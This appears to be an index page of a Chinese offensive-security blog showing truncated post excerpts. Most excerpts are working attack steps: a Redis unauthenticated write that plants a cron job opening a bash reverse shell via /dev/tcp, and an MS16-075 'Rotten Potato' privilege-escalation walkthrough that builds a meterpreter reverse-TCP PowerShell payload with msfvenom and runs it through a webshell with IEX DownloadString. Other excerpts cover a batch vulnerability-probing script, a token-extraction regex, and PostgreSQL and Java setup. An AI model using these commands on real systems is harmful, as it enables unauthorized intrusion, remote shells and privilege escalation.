1. redis-cli -h -p -a 2.一分钟反弹 set xxx “\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/xxx.xxx.xxx.xxx/6666 0>&1\n\n” config set dir /var/spool/cron config set dbfilename root save 3.nc 监听
利用ms16-075配合MSF提权方法(烂土豆提权)
事因:偶遇护卫神,这php权限给弄的只有一点点了。N久没提权,手动扒扒,发现以前的提权方式都不行了。(这个方法目测还能坚持个一年半载的) 直接开始: 1.msfvenom 生成个powsershell 反弹后门: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxxx LPORT=9990 -f psh-reflection >> ps1.ps1 生成好之后丢到公网服务器 2.使用大马执行powershell下载刚刚生成的ps反弹msf的脚本: powershell.exe -exec Bypass -nop -c “IEX (New-Object Net.WebClient).DownloadString(‘http://xxxx/ps1.ps1’)” 3.反弹到MSF之后开始使用MSF配合烂土豆提权: > use incog […]
批量检测url存活
[codesyntax lang=”python”] import requests import re import urllib3 urllib3.disable_warnings() i=0 file = open (r”./1.txt”) for eachLine in file: eachLine=eachLine.rstrip(‘\n\r’) try: i=i+1 print i res = requests.get(eachLine+”uri”,verify=False,timeout=5) hehe=res.text status=ur’SUCCESS’ ip=re.findall(status,hehe) if ip: vul=requests.get(eachLine+”uri”,verify=False,timeout=5) money=vul […]
密码保护:BC平台接口上传漏洞
postgresql使用相关说明
管理PostgreSQL用户和数据库 1. 以管理员身份登录数据库 postgres 用户 root@attacker:~#sudo -u postgres psql //li连接外部数据库root@attacker:~# psql -U postgres -h 127.0.0.1 2. 创建数据库用户及其密码 postgres=# create user msf with password ‘admin’; CREATE ROLE 3. 修改数据库用户密码 postgres=# alter user postgres with password ‘admin’; ALTER ROLE 4. 创建数据库及其属主 postgres=# create database msf with owner=msf; CREATE DATABASE 5. 退出数据库 postgres=# \q (退出 […]
ubuntu安装oracel-java8/9非openjdk
安装Jave8 1. 导入Webupd8 PPA sudo add-apt-repository ppa:webupd8team/java sudo apt-get update 2. 安装 sudo apt-get install oracle-java8-installer 选择确认条款,用Tab键切换。 3. 设置为默认jdk //sudo update-java-alternatives -s java-8-oracle sudo apt install oracle-java8-set-default 安装Java9 1. 导入Webupd8 PPA sudo add-apt-repository -y ppa:webupd8team/java sudo apt-get update 2. 安装 sudo apt-get install oracle-java9-installe […]
ctrl+c/v 系列代码
用来dump内存数据后,查找关键信息 while true;do command;sleep 2;done [codesyntax lang=”php”] # _*_coding:utf-8 _*_ import sys import re reload(sys) sys.setdefaultencoding(‘utf8′) def numberChange(path): f = open(path,’r’) s = f.read() for i in [“utf8″,”gb2312”]: try: data = s.decode(i) break except: pass number = re.compile(ur'(TOKEN=[a-zA-Z0-9]{32})’) pattern = re.compile(number) all = pattern.finda […]